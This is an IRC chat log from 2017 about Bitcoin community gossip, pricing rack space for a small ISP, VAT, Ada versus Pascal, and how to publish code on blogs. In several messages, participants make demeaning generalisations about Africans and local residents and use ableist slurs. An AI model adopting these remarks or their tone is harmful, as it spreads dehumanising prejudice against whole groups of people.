make it worse 1738685;1510708834;BingoBoingo;Triple even 1738686;1510708877;BingoBoingo;I am learning so much from her talking about her shopping process for next motor carriage 1738687;1510709027;BingoBoingo;brb, sobertime 1738688;1510709141;phf;it might be a sign of old age, that you attract those tiny kittens, and while they talk you're like "jesus fucking christ you're so dumb", but then you tell them to do a little trick and they do it almost correctly, and you're like "oh hey you're educable, neat, what else can you do" 1738689;1510709366;asciilifeform;oh did i mention, the balun crumbled in my hands ? 1738690;1510709378;mod6;phf: hehe 1738691;1510709388;asciilifeform;oh and did i mention, it was a ~security camera~ balun ?! 1738692;1510709467;mircea_popescu;the double entendre is now a triple entente. 1738693;1510709527;mircea_popescu;asciilifeform perhaps you don't know your own strengths. 1738694;1510709547;asciilifeform;and it isn't as if there is nonchinese equipment for sale somewhere. unless you count the for-usg 'weight in gold' nonsense 1738695;1510709550;asciilifeform;lel 1738696;1510709594;asciilifeform;( how many burn with desire to pay 5k usd for receiver ) 1738697;1510709597;davout;in other lulz goldmines https://www.reddit.com/r/btc/comments/7cvzu6/now_that_the_debate_is_over_lets_finally_make/ 1738698;1510709735;asciilifeform;davout: it is not clear from link, are they begging for donation in proper btc, or shitcoinz 1738699;1510709752;davout;latter 1738700;1510709773;davout;but i'm sure they'd accept the former, to "raise awareness" 1738701;1510709932;davout;the thing that amuses me, is that they seem to be rehashing exactly the same nonsense as proper bitcoin reddit was doing 3 or 4 years ago 1738702;1510709959;asciilifeform;ymean prb reddit ? 1738703;1510709971;davout;exact same nonsense, "raise funds for marketing campaigns", "ask merchants to accept it", "tipping bots", literally the exact same things 1738704;1510709974;davout;asciilifeform: yes 1738705;1510709987;asciilifeform;lol tipping 1738706;1510710000;mircea_popescu;idiots making progress forward can only be possibly used for oven stoking. 1738707;1510710016;asciilifeform;and how come nobody 'ask merchants to accept' gold 1738708;1510710021;mircea_popescu;"years of infighting" ? what, over this week-old fart ? 1738709;1510710058;mircea_popescu;davout they're ~same people. 1738710;1510710090;mircea_popescu;the problem with "tide lifts all boats" is that where boat is comes as function of boat not function of "tides". 1738711;1510710122;davout;"Let's as X to accept buttcash donations" 1738712;1510710133;mircea_popescu;subsistence african farmer is not subsistence african farmer "for lack of opportunities", but for subsistence farmer substance. whether in detroit or durban 1738713;1510710168;asciilifeform;african farmer is three steps ahead of redditus 1738714;1510710179;mircea_popescu;depends from where you count. 1738715;1510710179;asciilifeform;farmer at least has a notion of causality, say 1738716;1510710193;asciilifeform;and of finite resource 1738717;1510710194;mircea_popescu;absolutely not. 1738718;1510710207;mircea_popescu;they both have the ~exact same notion. "follow group and moo." 1738719;1510710207;asciilifeform;redditus neither sows nor reaps 1738720;1510710228;mircea_popescu;they both sow and reap in the same way the same things : incomprehensible seeds on uncomprehended space. 1738721;1510710269;mircea_popescu;dja understand, asciilifeform, what my bizarre address MEANS ? to you, it's just a curio. you readily fail to realise that the CAUSE of that is that local simply has no notion of cartesian space. 1738722;1510710284;mircea_popescu;you think, "how could mind exist, that fails to understand every plane has underneath system of coordinates". 1738723;1510710298;mircea_popescu;it can. hence, for instance, no roads here cross. they loop. dja even grok on your own what i fucking mean by this ? 1738724;1510710310;mircea_popescu;cuz it's a stretch of the imagination in a way not commonly required to stretch. 1738725;1510710356;asciilifeform;i've not worked as a caretaker of the profoundly retarded, neh, so can't say i experienced directly 1738726;1510710359;mircea_popescu;you may, on a novel road, wonder if it's a dead end. i don't wonder that. i know it's a dead end. because no CONCEPTION of grid, see. it's not that they failed to implement it. it's that they don't realise such exists. 1738727;1510710400;mircea_popescu;nothing is ever signalled ; not even one way streets. because the local never ventures outside of spaces it knows, so doesn't need signals. why not ventures ? 1738728;1510710405;mircea_popescu;and so on following until you fall over. 1738729;1510710409;asciilifeform;grid requires some notion of future, vs extending like tree roots 1738730;1510710421;mircea_popescu;it's what i mean by "uncomprehended space". 1738731;1510710434;mircea_popescu;shall we now do the incomprehensible seed ? all the way to the witch doctors, just as good as medicine ? 1738732;1510710443;asciilifeform;farmer gotta conceptualize at least seasons tho, neh 1738733;1510710450;mircea_popescu;neh. 1738734;1510710461;mircea_popescu;farmer, like the sheep that he IS, merely follows the herd, and dies with it. 1738735;1510710473;mircea_popescu;that's the great "progress" of agriculture : the shepherd's sheep were replaced by bypedal farmers. 1738736;1510710482;mircea_popescu;just as sheep as the sheep. 1738737;1510710513;mircea_popescu;has "a conception" of seasons. a sheep's notion of the world surroundant. 1738738;1510710529;mircea_popescu;wtf does he need the difference between surround-ing and surround-ant ? mordant is not a word, is it ? 1738739;1510710539;mircea_popescu;aaanyway. let's move to a diff topic lest i thoroughly depress myself. 1738740;1510710578;asciilifeform;i now recall some anthropologist who had problems giving fiction, incl simple hypotheticals, to some african sad sacks 1738741;1510710590;asciilifeform;who , yes, had no coprocessor for it... 1738742;1510710595;asciilifeform;depressing. 1738743;1510710629;asciilifeform;oh did i mention that the antenna per se, turned out to be... old lamp cord 1738744;1510710673;asciilifeform;the only further insult i can think of, is if it somehow were to set the rubbish bin where i threw it, on fire 1738745;1510710688;mircea_popescu;should have prolly dissected it on blog. 1738746;1510710743;asciilifeform;ars longa... 1738747;1510710982;asciilifeform;gotta wonder, how many other 'hey it's soo cheap and available!' technomarvels, on examination would turn up to be exactly same as this 1738748;1510711027;mircea_popescu;aren't we like 100% to date ? 1738749;1510711047;mircea_popescu;what technomarvel worked once sat upon ? 1738750;1510711084;asciilifeform;sorta like asciilifeform's discovery few yrs ago, where turned out that e.g. lathe was considerably easier to get in '50s than today, but 'hey , hurr , 3d printers!!' etc 1738751;1510711162;asciilifeform;lolyea nearly 100 1738752;1510711244;asciilifeform;'here have iron that dun heat' 'have a radio that picks up only own tuner oscillator' bbut at leadt Cheap!! 1738753;1510711252;asciilifeform;*least 1738754;1510711329;asciilifeform;iirc mircea_popescu had article where 'they're ceremonial objects, actual functionality in'em is like legs on snake' or similar 1738755;1510711358;mircea_popescu;i'm sure. 1738756;1510712822;deedbot;http://trilema.com/2017/items/ << Trilema - Items 1738757;1510713326;mod6;<+ben_vulpes> quit drivin on the sidewalls girl << lel 1738758;1510713645;mod6;ooh laboratorio & hacker-space 1738759;1510714064;mircea_popescu;realidad virtual! 1738760;1510714337;mod6;my first time in .mx many many years ago, i was like "Bimbo Bread? wtf, don't they know..." 1738761;1510714966;asciilifeform;http://btcbase.org/log/2017-11-14#1737763 fascinating read btw. 1738762;1510714966;a111;Logged on 2017-11-14 15:58 mircea_popescu: (amusingly, the unsupportable and otherwise batshit insane ugc in http://trilema.com/2011/procesul-ceausescu/ is ~100% unsourced copy/pastes from the dude's "red horizons" booklet) 1738763;1510715198;wer;hello 1738764;1510715417;phf;!#seenbefore wer 1738765;1510715420;phf;heh 1738766;1510716352;wer;how do i view my id on wot 1738767;1510716795;mod6;hi, are you looking @ wot.deedbot.org ? 1738768;1510716963;wer;i'm not sure 1738769;1510716970;wer;how do i identify myself? 1738770;1510717179;mod6;http://www.deedbot.org/help.html 1738771;1510717207;mod6;it seems like you already did an "!!up" to deedbot. 1738772;1510717264;wer;yes i did 1738773;1510717288;wer;there's this message "This nickname is registered. Please choose a different nickname, or identify via /msg NickServ identify ." 1738774;1510717397;BingoBoingo; the double entendre is now a triple entente. << You probably wouldn't be interested in Miss trainwreck because height is in the range that is short for you and ergonomic for me 1738775;1510717492;BingoBoingo; i've not worked as a caretaker of the profoundly retarded, neh, so can't say i experienced directly << Do you want to come visit before we depart for our seperate ventures? I can make introductions. Maybe even get you some shifts at the BingoBoingo store. 1738776;1510717500;mod6;wer: did you register your nick with nickserv? 1738777;1510717579;wer;i'm not entirely sure 1738778;1510717588;wer;i logged on here 2 or 3 days ago 1738779;1510717628;mod6;Registered : Dec 31 06:23:43 2009 (7y 45w 5d ago) 1738780;1510717635;mod6;not too much younger than mine even 1738781;1510717668;mod6;so when you connect to irc do you do the typical 'identify' command with nickserv ? 1738782;1510717694;wer;i don't 1738783;1510717708;wer;perhaps another user from before used the same nickname too 1738784;1510717714;mod6;yeeep 1738785;1510717763;mod6;and if that person grabs it back with 'ghost' or whatever, then you're sol. 1738786;1510717800;wer;damn 1738787;1510717812;mod6;are you sure it wasn't you that set it up so long ago? 1738788;1510717878;wer;very 1738789;1510717947;mod6;ah, ok. well... im not sure what the protocol is then for changing your nick in deedbot, but I'm sure trinque needs to assist you with that/ 1738790;1510717959;mod6;s/\/// 1738791;1510718050;wer;ah thanks anyway 1738792;1510718401;trinque;isn't any method for changing a nick. 1738793;1510718409;trinque;you can just register a new key, though 1738794;1510718444;mod6;ah, ok. thx trinque 1738795;1510720580;BingoBoingo;!~ticker --market all 1738796;1510720587;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6800.0, vol: 13477.06062120 | Bitfinex BTCUSD last: 6776.8, vol: 55613.40039211 | Kraken BTCUSD last: 6860.9, vol: 4520.58920367 | Volume-weighted last average: 6786.21230096 1738797;1510721576;mats;http://btcbase.org/log/2015-08-29#1255753 << any suggestions for (preferably en-translated) reading material on this subj? 1738798;1510721576;a111;Logged on 2015-08-29 19:03 asciilifeform: trinque: btw it was not clear to the folks who ran the camps, that this naturally-occurring system of hierarchy was a net plus re: net tonnage from the mines. hence the 'vory/suka wars' mircea_popescu referenced, a famous case where su authorities tried to monkey with the 'org chart' 1738799;1510721966;trinque;if tits register a new key, are they thereby new tits? 1738800;1510723555;BingoBoingo;For trinque and other parties interested in shipping their own boxes, considering the current cost basis and exchange rates to get a server homed for the first year is looking like ~0.57-0.6 BTC per rack unit (minding that especially power hungry servers may count as multiple rack units despite their physical footprint) 1738801;1510724105;trinque;bit steep. how'd you arrive at that? 1738802;1510726076;BingoBoingo;Math is ({[Montly costs of rack + business address + cost of off the shelf corporation (amoratized over 12 months)]/40 rentable rack units} * 12 months) * 2 per http://btcbase.org/log/2017-10-22#1727598 at 6800 usd per BTC 1738803;1510726076;a111;Logged on 2017-10-22 05:20 mircea_popescu: your cost basis is ~200 per server. you can rent them for 3-400 as such, or can give out vpsen, which are more productive. perhaps even "shared" if particularily interested into it. 1738804;1510726327;BingoBoingo;amoratizing fixed costs (corporation, LACNIC IP address assignment) over 24 months rather than 12 offers little reduction in cost basis 1738805;1510726473;BingoBoingo;Mind that this includes minimum viable commercial address (comes with locker, desk and coffee) for 244 monthly after VAT 1738806;1510726561;BingoBoingo;Doing anything in a Zona Franca would allow for avoiding VAT, but it would put the bill for a commercial address close to the cost of the rack and come with pressure to hire 3 descendants of Italian refugees 1738807;1510726620;*;BingoBoingo still refining worksheet 1738808;1510726767;BingoBoingo;*244 USD monthly on the desk 1738809;1510726863;BingoBoingo;The meat of the cost is in rack with connectivity 1738810;1510726970;*;BingoBoingo does not know what alf-isp numbers look like, but does not imagine too different 1738811;1510727291;BingoBoingo;Mind that ~0.6 ish BTC hit this year to home a server would mean ISP exists for next year when FX risk likely takes more favorable turn and cost basis starts diminishing 1738812;1510728000;*;BingoBoingo to bed. Hopes these numbers/reasoning receive comment. 1738813;1510729283;trinque;curious what happens to the price when btc buying power increases, as it likes to do. 1738814;1510729678;trinque;could be as simple as billing monthly in advance, calculating bill as u*$operatingCost*1.15/40 or whatever margin atop you think is reasonable. $operatingCost denominated in BTC should be going down all the time 1738815;1510729710;trinque;* $u 1738816;1510742178;mircea_popescu;mod6 aha! fucking hysterical. and it's a huge paper-bread franchise too, all over latam. 1738817;1510742209;mircea_popescu;asciilifeform my pleasure. 1738818;1510742271;mircea_popescu;BingoBoingo check out the wonders of mother nature! no need to quarrel! 1738819;1510742331;mircea_popescu;wer perhaps another user from before used the same nickname too << yes. someone else registered the nick, but didn't set enforcement on it. as a result you can use it (you don't get kicked by nickserv) but can't register it yourself. ask in #freenode if they're willing to move it over to you ; if not, find a diff name and register that. 1738820;1510742645;mircea_popescu;in other lulz : "gerry john gerryjohn151@gmail.com Submitted on 2017/11/14 at 11:16 p.m. HELLO EVERYONE I AM GIVING A TESTIMONY OF HOW I GOT RICH POWERFUL AND FAMOUS TODAY" 1738821;1510742668;mircea_popescu;somehow the african notion of "famous" does not preclude the need to "give testimony". wouldn't i already know about him if he were famous ? 1738822;1510742721;mircea_popescu;oh wait, THEYRE JUST WORDS. and yet the usg socialist is not ==== the subsaharan retard. because... DIFFERENCE, just like FAMOUS. they'll give testimony on the difference! 1738823;1510742814;mircea_popescu;(in other lulz : nigeria took over south africa to become africa's largest economy years ago). 1738824;1510742835;mircea_popescu;"emerging global power" and whatnot. 1738825;1510743795;mircea_popescu;http://btcbase.org/log/2017-11-15#1738804 << mno, you can't get both margins. either you put your whole cost structure into the bottom line, in which case you charge that ; or else you put your recurrents into the bottom line, charge *2 and amortize your fixed costs out of the 2nd part of that *2. 1738826;1510743795;a111;Logged on 2017-11-15 06:12 BingoBoingo: amoratizing fixed costs (corporation, LACNIC IP address assignment) over 24 months rather than 12 offers little reduction in cost basis 1738827;1510743939;mircea_popescu;http://btcbase.org/log/2017-11-15#1738805 << see, this is the terrible habit of poor organisation. you don't say "VAT here is x%, and apparently can be avoided in so and so circumstances with so and so riders which works out to a minimum Y value past which it's worth doing". 1738828;1510743939;a111;Logged on 2017-11-15 06:14 BingoBoingo: Mind that this includes minimum viable commercial address (comes with locker, desk and coffee) for 244 monthly after VAT 1738829;1510743946;mircea_popescu;which is what you SHOULD say. no exceptions. 1738830;1510743977;mircea_popescu;you just say "VAT". it can not be said, this word, by itself. it must be introduced, and retrospective half-ass, i'm not even gonna mention the % is rather infuriating. 1738831;1510744452;mircea_popescu;http://btcbase.org/log/2017-11-15#1738811 << there's significant FX exposure in this scheme. consider the situations : someone pays you .6 BTC to whatever. a) BTC goes to 1mn usd ; he has now paid you 600k to do work worth 4k or so. this eventuality tends to discourage longer term payments. 1738832;1510744452;a111;Logged on 2017-11-15 06:28 BingoBoingo: Mind that ~0.6 ish BTC hit this year to home a server would mean ISP exists for next year when FX risk likely takes more favorable turn and cost basis starts diminishing 1738833;1510744477;BingoBoingo;VAT here is off pissing 22% on "services". Will rechew numbers 1738834;1510744490;mircea_popescu;b) btc goes to $1. you're now on the hook for the same 3.5k, but if you didn't change the BTC to cash as you received it, you have no way to cover for it. this possibility makes just like a, people not want to pay long term. 1738835;1510744506;mircea_popescu;meanwhile if you DO cash it out as you get it, you cash it out as you get it (missing out on a along with your customer). 1738836;1510744536;mircea_popescu;i expect the correct solution will be weekly payments on yearly contracts. otherwise we end up encouraging antieconomic behaviour. 1738837;1510744561;mircea_popescu;trinque ^ that sound like sense ? "you get this rack for a year, to be paid $x every mon" ? 1738838;1510744568;mircea_popescu;mon*day i mean. 1738839;1510744663;mircea_popescu;BingoBoingo the problem with vat is that yes it's fucking annoying. but on one hand it generally replaces tarriffs, ie contrary to how annoying it is it has a neutral delta (case of dun shoot the messenger) and on the other hand many jurisdictions offer credible solutions. eg, romania has no vat for corps under a certain threshold, which is why i have corps there. 1738840;1510744670;mircea_popescu;i can't imagine brazil doesn't have something similar. 1738841;1510744730;mircea_popescu;o look, they don't. hm. 1738842;1510744770;BingoBoingo;The problem is the "services" VAT hits on the rack 1738843;1510744801;mircea_popescu;BingoBoingo it's a VALUE ADDED tax. you get it back when you export. 1738844;1510744871;mircea_popescu;ie, if you buy a 1mn worth of widgets, 22% vat, and then you sell them, for 1.1mn, 22% vat, you will get back 220k worth of vat to offset your 242k obligation, leaving you with a 22k vat net payment on the .1mn you actually added. 1738845;1510744886;mircea_popescu;so if you pay vat on the racks, see how exactly you qualify to get it back. 1738846;1510744914;mircea_popescu;(if you do. govts are notoriously iffy about ACTUALLY living up to the part of their promise where money flows back out) 1738847;1510745067;mircea_popescu;http://btcbase.org/log/2017-11-15#1738838 << actually this suggests to me a grand scheme which'd allow us to produce an ACTUAL bitcoin price! behold the following scheme : 1738848;1510745067;a111;Logged on 2017-11-15 11:16 mircea_popescu: mon*day i mean. 1738849;1510745191;mircea_popescu;every fixing day (arbitrary day of week we choose), tmsr.isp lists the TOTAL it has to pay, and makes a bitcoin/usd offer. it can be arbitrarily anything, but in practice it'll be the output of !~ticker --market all Volume-weighted last average: bit (which is fucking ridiculous already, we're tracking bitfinex who the fuck came up with this) or else whatever rate whatever exchange the isp uses. 1738850;1510745220;mircea_popescu;each of its customers has a choice : can either settle the amt due in bitcoin, at the proposed rate, or else can offer to make wire payment, for the TOTAL amount only. 1738851;1510745243;mircea_popescu;if more than 1 customers option to pay via wire, the price is lowered by 1% in rounds until only one is left standing. 1738852;1510745269;mircea_popescu;this is pureblood fixing, much like prices were established back when the jews did it, before socialists murdering them all and taking over. 1738853;1510745559;diana_coman;!!seen PeterL 1738854;1510745560;deedbot;2017/09/16 03:22:27 Why is it that papers written by one guy still insist on using the "We" form for all the things they do? 1738855;1510745631;diana_coman;I've been playing around with the keccak implementation from PeterL and it seems overall all right 1738856;1510745648;mircea_popescu;o yeah i wonder what he's up to 1738857;1510745694;diana_coman;I don't even know whether he tested it or how otherwise; also not sure if there isn't some way around using Strings.Unbounded 1738858;1510745806;BingoBoingo; so if you pay vat on the racks, see how exactly you qualify to get it back. << More is to be done here 1738859;1510745875;BingoBoingo; if more than 1 customers option to pay via wire, the price is lowered by 1% in rounds until only one is left standing. << Now this is interesting 1738860;1510745921;mircea_popescu;BingoBoingo it's also only functional if we really have enough of a bottom line to make weekly wires feasible. nobody's wiring 300 bux 1738861;1510745977;BingoBoingo;Right, but it's a direction to grow in 1738862;1510745988;mircea_popescu;kinda teh point :p 1738863;1510746003;mircea_popescu;the more shit we get the more shit we can get. 1738864;1510747127;*;BingoBoingo to a lab, then mathtime 1738865;1510749883;mircea_popescu;and in other mangoes, http://78.media.tumblr.com/116244e0c68c1e3784b273ed517a09cb/tumblr_nm3hvzklBe1u7fo01o1_1280.jpg 1738866;1510750046;mircea_popescu;!!up mobile46836 1738867;1510750046;deedbot;mobile46836 voiced for 30 minutes. 1738868;1510753908;asciilifeform;http://btcbase.org/log/2017-11-15#1738857 << his keccak.adb per se, didn't use it. it was in the demo routine, for file i/o ( entirely unnecessarily) 1738869;1510753908;a111;Logged on 2017-11-15 11:34 diana_coman: I don't even know whether he tested it or how otherwise; also not sure if there isn't some way around using Strings.Unbounded 1738870;1510754906;diana_coman;asciilifeform, right 1738871;1510755523;asciilifeform;diana_coman: you can painlessly abolish 99% of where typical cprogramming victim would use a dynamicism, by use of the declare-begin-end construct to allocate statics on the current stackframe 1738872;1510755564;asciilifeform;( see also http://www.adaic.org/resources/add_content/standards/05rm/html/RM-5-6.html , and ffa ) 1738873;1510755577;*;diana_coman finds ada rather endearingly - possibly because it reminds of Pascal 1738874;1510755584;diana_coman;will check 1738875;1510755592;asciilifeform;diana_coman: it was made out of pascal 1738876;1510755621;asciilifeform;( legend has it, there were three ada contestants, and the pascalist won. nothing is known re others. ) 1738877;1510755657;diana_coman;we were started on pascal in 9th grade and explicitly "because it forces order and neatness unlike c/cpp" ; unfortunately at uni it was mainly c/cpp/java 1738878;1510755657;*;asciilifeform grew up with, and liked, pascal 1738879;1510755693;asciilifeform;funnily enough it was also taught in 9th g. of ameristani school. at least when i went to it 1738880;1510755703;asciilifeform;( year after, replaced with... vb ) 1738881;1510755712;diana_coman;aha, I liked it too; but then everywhere I went it was ...java/c/cpp 1738882;1510755731;asciilifeform;microshit sets curriculum.. 1738883;1510755745;diana_coman;oh, ugh; and yes, now you mention it I think it was same-change in Ro too 1738884;1510760200;asciilifeform;ada ( even asciilifeform's 'fascist' ada subset ) is not exactly pascal. imho the most notable departure is the array slice abstraction, which makes for a 90% moar compact ffa ( and applies to almost anything else dealing in bitstrings, for that matter ) 1738885;1510760238;asciilifeform;the 'declare' construct mentioned earlier, also iirc did not exist in traditional pascal 1738886;1510760288;asciilifeform;neither did modular types of arbitrary bitness, and several other minor nuts and bolts of ffa, that i cannot immediately recall. 1738887;1510760331;asciilifeform;( runtime generic instantiation certainly did not exist, and really has no analogous item in any other statically compiled language afaik ) 1738888;1510760792;diana_coman;oh, certainly; I wasn't under any illusion that ada==pascal, no; there is some danger in the perceived similarity too, basically the "false friend" type 1738889;1510765621;mircea_popescu;re the "I don't even know whether he tested it or how otherwise;" bit -- this is the sad effect of publishing pastes/github links etc. 1738890;1510765642;mircea_popescu;a snipped of code IS NOT SUFFICIENT. you gotta say ALL SORTS of things. such as this, yes, how it was tested and for what. and so following. 1738891;1510765667;asciilifeform;pretty sure asciilifeform typically eats moar space in l0gz per paste, than paste weighs 1738892;1510765675;mircea_popescu;just like in physics you can't say "5", a number, gotta say 5 WHATS ; just how BingoBoingo can't say "VAT", just so programmer can't say "here'\s code" 1738893;1510765693;mircea_popescu;asciilifeform yes but this is notoriously bad arrangement. put them in a single node in a place organized for this. 1738894;1510765757;mircea_popescu;something like http://www.dianacoman.com/2017/04/13/bundling-with-foxybot/ works a lot better because i can generally handle it on my own and if not can discuss it there, which also helps with scheduling. 1738895;1510765768;asciilifeform;i've enough trouble keeping track of 9000 mutually contradictory variants of every possible thing, on own disk 1738896;1510765772;asciilifeform;much less for publication. 1738897;1510765794;mircea_popescu;but at some time you stop actively working on it 1738898;1510765797;mircea_popescu;that's the wrap-up. 1738899;1510765802;asciilifeform;at that time whole thing gets v-released. 1738900;1510765816;mircea_popescu;no. that's when you stop altogether. when you stop working on it FOR NOW 1738901;1510765819;asciilifeform;as it is , 100% of the thing is in may-theoretically-change form. 1738902;1510765826;mircea_popescu;and more generally -- gotta organize your own process to interop sanely with others. 1738903;1510765864;mircea_popescu;asciilifeform not a matter of the thing. a matter of you. "ima spend a week banging on this next month, and then maybe i pick it up agaion next year" is the scheduling form ; and this means there's a post sometime next month 1738904;1510765904;mircea_popescu;but coding is coder-centric not code-centric. leave aside teh faux modesties of githubs and other usgtardations and set things on their proper footing : coding is all about the coder. 1738905;1510765970;mircea_popescu;at which point i feel teh urge to also link http://www.dianacoman.com/2017/06/12/o-brave-new-code/ as it's such a perfect dialectic expose of the differences. code-about-code vs code-about-coder. 1738906;1510766021;asciilifeform;it's a good post, but i notice it also does not include any coad 1738907;1510766037;mircea_popescu;the first or the 2nd ? 1738908;1510766045;asciilifeform;the last link 1738909;1510766049;asciilifeform;diana_coman's 1738910;1510766059;mircea_popescu;well no, it's moar like a poem. 1738911;1510766081;mircea_popescu;the "here's how to add a new activity to foxybot" one does, yes. 1738912;1510766107;asciilifeform;i was just thinking about this, this morning, during the 'declare' thread -- wanted to link to a particular item in ffa, and realized that i couldn't 1738913;1510766184;diana_coman;ftr for the serpent ada implementation I wrote the testing part: grabbed published test vectors and wrote a snippet to eat them up, call the serpent, check results, complain if any mismatch 1738914;1510766197;asciilifeform;diana_coman: what was the result ? 1738915;1510766204;mircea_popescu;asciilifeform esp with the trilema-style js links youi can link to arbitrary spot 1738916;1510766220;diana_coman;asciilifeform, all passed 1738917;1510766224;mircea_popescu;there's a lot of various mechanisms that conspire to work together, just, gotta get human element to stop orcing it all up 1738918;1510766225;asciilifeform;diana_coman: neato 1738919;1510766260;asciilifeform;mircea_popescu: syncing a wp turd with coad on disk, in flux, is a bitch tho 1738920;1510766300;asciilifeform;and line numbering is destroyed every time thing changes 1738921;1510766306;mircea_popescu;can write a tool for it. blog is on mysql 1738922;1510766335;mircea_popescu;but yes, if you change version you're in a different situation than here contemplated. 1738923;1510766340;asciilifeform;this item calls for something like phf's v-viewer 1738924;1510766373;mircea_popescu;let's understand each other. 1738925;1510766378;mircea_popescu;coding has four phases. as follows : 1738926;1510766408;mircea_popescu;phase 1, when the mind reads. this is the normal state, whether you're trying to understand another's implementration or the republican design or clicking on tit pictures, you're in phase 1. 1738927;1510766448;mircea_popescu;phase 2, when you write code. this is the excited state, "fuck this shit ima bang something out". it's like prototyping, not even clear whether something comes of it after all. many excited discussions here fail to progress past 1, "oh, I SEE what you meant!" is often their death knell. 1738928;1510766515;mircea_popescu;phase 3, when you are done writing code FOR NOW. this is traditionally the "refactor break". this is also when you publish, explaining other than the code what you did and why, in detail. this included "i tested so and so -- i didn't test so and so" as it includes "i asume so and so". countrary to patently false subjective intution, this is the MOST valuabler of all the phases. 1738929;1510766549;mircea_popescu;phase 4, when you are done writing code for A WHILE. it doesn't mean the code's good or bad, it means you personally will be doing other things. in this interval typically people discuss your 3 and stuff happens outside of your hands. 1738930;1510766590;mircea_popescu;now, 4 can flow to 1 as it can flow back to 3, and 3 can flow to 1 as it can flow to 4 and so on and so forth. but the important point re these four phases is that they must be explicitly followed, for great personal as well as republic-wide gains of productivity and GDP. 1738931;1510766706;*;asciilifeform does not disagree with any part of this 1738932;1510766786;mircea_popescu;cool. 1738933;1510766794;mircea_popescu;now, 3 ends and returns with a blogpost. 1738934;1510766836;mircea_popescu;in preference of 1. a paste,forumdiscussion tuple ; 2. a github/medium/slockit/livejournal/slideshare/oglaf drawing etc ; 3. any other thing. 1738935;1510766931;asciilifeform;if a wwwtronicist ( ben_vulpes ? ) were to come up with a method of dropping ada into wp and getting out an item that doesn't wrap or truncate lines, destroy numberings, and allows linking to individual rows -- i will take off my hat 1738936;1510766933;asciilifeform;and use it. 1738937;1510766960;asciilifeform;as it is, it's a sisyphian labour 1738938;1510766961;mircea_popescu;neither my bash nor diana's c got truncated ? 1738939;1510766981;mircea_popescu;but this aside : adding the code as text files, linked from the post is perfecty acceptable. 1738940;1510767006;mircea_popescu;like how people did with their FG tests for instance. 1738941;1510767024;asciilifeform;the logical unit of code is not 'text file' but individual routine. and sometimes, sub-routine 1738942;1510767029;asciilifeform;and they gotta be discussed individually. 1738943;1510767040;asciilifeform;and be present on screen with the discussion. 1738944;1510767052;mircea_popescu;http://trilema.com/2017/how-the-beastforumcom-private-messaging-function-became-a-paid-user-only-item/ << dun like the what, spacing ? 1738945;1510767067;trinque;asciilifeform: white-space: nowrap (css) on a pre tag oughta do that 1738946;1510767075;mircea_popescu;consioder that for i in {1934360vii..1..12viii}; do usrix= << you can't fucking beat adnotated codelines jesus god. 1738947;1510767078;asciilifeform;mircea_popescu: it's soup, no lines, no structure 1738948;1510767083;mircea_popescu;it is single line. 1738949;1510767093;mircea_popescu;bash command line stuff you know. 1738950;1510767134;mircea_popescu;but ok, back to http://www.dianacoman.com/2017/04/13/bundling-with-foxybot/ << 1738951;1510767157;mircea_popescu;(can trivially set theme to overflow right, ~like her does) 1738952;1510767165;asciilifeform;that looks like shit on my display btc 1738953;1510767170;asciilifeform;*btw 1738954;1510767172;mircea_popescu;scroll down. 1738955;1510767180;asciilifeform;i run vertical display 1738956;1510767185;mircea_popescu;imo this is the correct usage of html, make the code line as long as it needs. 1738957;1510767188;mircea_popescu;ah you don't like scrolling right ? 1738958;1510767203;asciilifeform;i'm ok with vert scroll 1738959;1510767212;mircea_popescu;so you want a) arbitrary long lines on b) arbitrary narrow display in c) fixed point that nevertheless d) do not truncate ? 1738960;1510767234;asciilifeform;afaik my lines are all in 80col 1738961;1510767249;mircea_popescu;asciilifeform so if you are, then what she does is correct (minus that overlaid in the way right bar). consider a line like if (!from || from->stackCount < quantity) { OutputMsg(csString("Not enough ingredients for bundling! Bot stopping.")); Error(); return false; } else { worldHandler::MoveItems(from->containerID, from->slot, toContainer, nextEmptySlot, quantity); 1738962;1510767253;mircea_popescu;it's all in one line on her blog. 1738963;1510767294;asciilifeform;diana_coman's item is moar or less the right thing, except that it is impossible to link to individual line 1738964;1510767305;asciilifeform;( even with mircea_popescu's script, if the code is changed, the links are mutilated ) 1738965;1510767327;mircea_popescu;there's no intention for blogposts to be liquidshit. once published they stay ; you want to change post another one. 1738966;1510767357;asciilifeform;9000 posts containing almost-same item, is not anyone's idea of readable 1738967;1510767373;mircea_popescu;asciilifeform i think it is the right thing, minus that she should prolly change that Recent Posts divbox to float right with the content rather than be fixed. but this is a one byte fix 1738968;1510767393;mircea_popescu;asciilifeform it is! it is EVERYONES! idea of readable. there's no other fucking readable. 1738969;1510767401;mircea_popescu;hence journaling filesystems. 1738970;1510767415;asciilifeform;readable is when structure is maximally preserved. 1738971;1510767435;mircea_popescu;if you have a problem with confusing phase 2 and phase 3, this blogposting is exactly the pill required to resolve it. 1738972;1510767448;mircea_popescu;(and no, even if it may seem comfortable, the confusion is antiproductive) 1738973;1510767455;asciilifeform;in particular, related items gotta be near 1738974;1510767469;mircea_popescu;asciilifeform you just tell people "follow the last". 1738975;1510767501;mircea_popescu;this is also how manuals work, like say http://www.eulorum.org/index.php?title=Eulora&action=history 1738976;1510767501;trinque;asciilifeform: reintroducing structure atop the browser's dom isn't sensible, see: semantic web 1738977;1510767521;mircea_popescu;there'\s as you can see 100s of diff variants 1738978;1510767522;asciilifeform;trinque: i have nfi if what i asked for, can be done with extant www shitstack 1738979;1510767539;trinque;thing'd have to know the code's AS 1738980;1510767541;trinque;*AST 1738981;1510767592;asciilifeform;trinque: not necessarily, could even store the lines individually, rather than as single text string, and generate the html soup in variants depending on number in url 1738982;1510767628;trinque;eh, easier to just preserve revisions, and let people link to a particular one 1738983;1510767639;trinque;no guarantee the linker *wants* to link your latest 1738984;1510767650;asciilifeform;trinque: but let's say i take a routine from earlier ( e.g. unrolled comba mult ) and the rest -- from last week's 1738985;1510767665;asciilifeform;and now would like to represent this transform without destroying structure. 1738986;1510767668;mircea_popescu;asciilifeform if that's your node level you are well advised to make posts for them rather than for the combo. 1738987;1510767695;asciilifeform;mircea_popescu: knowing into what granularity thing must break, would require being able to tell the future, neh 1738988;1510767699;mircea_popescu;And in this here FFa post we will be taking Comba Mult version x from y date and together with last week's X, Y and Z, and make this pile 1738989;1510767713;asciilifeform;this is the naggum-cpp problem all over again -- we do not know, when beginning a project, the ultimate granularity. 1738990;1510767719;mircea_popescu;asciilifeform neh, because it's your fucking blog, reflecting what you know when you write it not what you come to find in writing it 1738991;1510767727;mircea_popescu;which is why it's even interesting to have one as an intellectual activity. 1738992;1510767966;*;asciilifeform finally dug up link to what asciilifeform sees 